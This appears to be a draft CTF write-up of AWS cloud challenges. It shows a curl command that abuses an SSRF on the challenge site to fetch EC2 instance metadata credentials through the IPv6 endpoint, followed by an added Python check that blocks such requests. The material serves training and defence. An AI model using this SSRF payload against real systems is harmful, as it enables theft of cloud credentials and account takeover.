AWSome challenges
AWS cloud jeopardy CTF. [DRAFT]
AWSome challenge - part1
Context
The local company has been compromised and its critical information is for sale on darknet markets, certainly because of a CloudOps infrastructure misconfiguration…
The Admin has implemented a native WAF but was not sure about the root cause. Could you please audit their main website for the root cause and provide help?
url: ctf.livingoffthecloud.com
Note:
- This was not shared during the challenge.
- This represents a simplified architecture and shouldn't be taken as an example for your production applications.
Target audit
- An SSRF is possible on the website, but it only allows HTTP GET calls from the backend servers.
- Let's explore that path to exfiltrate the instance metadata credentials.
Scanning the website ctf.livingoffthecloud.com:443
- The website
AWSome challenge - part2
Context
Thanks to the previous initial access, would you be able to go deeper?
url: ctf.livingoffthecloud.com
Target audit
Thanks to the previously acquired cloud credentials, we can scan the corresponding AWS account to discover which permissions we currently have.
[~/hsr2023/awsome1/]$ BOMA_YE="http://[fd00:ec2::254]/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
[~/hsr2023/awsome1/]$ curl -6 "https://ctf.cvx.livingoffthecloud.com/free-slots=$BOMA_YE"
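A server-side check that would refuse the metadata request shown above, including its IPv6 form, as an added example (not code from the challenge or its authors). The function names and the injectable `resolver` parameter are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Instance metadata endpoints: the IPv4 one and the IPv6 one used in the request above.
IMDS_ADDRESSES = {
    ipaddress.ip_address("169.254.169.254"),
    ipaddress.ip_address("fd00:ec2::254"),
}


def _system_resolver(host):
    """Return every address the host resolves to (A and AAAA records)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def _is_internal(addr):
    """True for IMDS and any non-public address, including IPv4-mapped IPv6."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (
        addr in IMDS_ADDRESSES
        or addr.is_private        # covers fd00::/8 and RFC 1918 ranges
        or addr.is_loopback
        or addr.is_link_local     # covers 169.254.0.0/16 and fe80::/10
        or addr.is_unspecified
        or addr.is_reserved
        or addr.is_multicast
    )


def is_fetch_allowed(url, resolver=_system_resolver):
    """Decide whether the backend may fetch a user-supplied URL."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # malformed bracketed host
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        candidates = [ipaddress.ip_address(parts.hostname)]  # IP literal
    except ValueError:
        try:
            candidates = [ipaddress.ip_address(a.split("%")[0])
                          for a in resolver(parts.hostname)]
        except (OSError, ValueError):
            return False  # fail closed when resolution fails
    # One internal address among the results is enough to refuse.
    return bool(candidates) and not any(_is_internal(a) for a in candidates)
```

The fetch that follows has to connect to the address that was validated rather than resolving the name a second time. Because the SSRF here is limited to GET, requiring IMDSv2 on the instances is the complementary control, since an IMDSv2 session token is obtained with a PUT request.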